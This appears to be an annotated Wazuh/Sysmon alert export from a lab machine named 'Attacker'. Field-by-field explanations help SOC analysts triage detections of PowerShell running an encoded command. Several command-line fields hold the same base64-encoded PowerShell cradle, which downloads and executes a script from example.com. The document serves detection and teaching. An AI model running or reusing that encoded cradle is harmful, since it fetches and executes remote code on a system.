data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:19.920 ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} ProcessId: 1672 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c18f-680a-f40c-000000000e00} ParentProcessId: 8928 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:19.920
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c193-680a-f60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c18f-680a-f40c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  8928
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:25.291+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:25.291+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  131
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535385.2824771
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:22.8755727Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350738
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:22.872 ProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} ProcessId: 1672 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1 CreationUtcTime: 2025-04-24 22:56:22.872 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:22.872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c193-680a-f60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  1672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_b1g5bu1u.tbb.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:22.872
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:27.723+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:27.723+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  128
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535387.2827536
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:25.7711247Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350777
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:24.033 ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} ProcessId: 14476 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} ParentProcessId: 1672 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:24.033
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c198-680a-f80c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14476
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c193-680a-f60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:28.678+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:28.678+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  132
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535388.2835603
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:26.0786930Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350778
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:26.056 ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} ProcessId: 14476 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_d23ja4vf.wy5.ps1 CreationUtcTime: 2025-04-24 22:56:26.056 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:26.056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c198-680a-f80c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14476
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_d23ja4vf.wy5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:26.056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:31.172+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:31.172+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  129
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535391.2838372
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:28.7132822Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350805
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

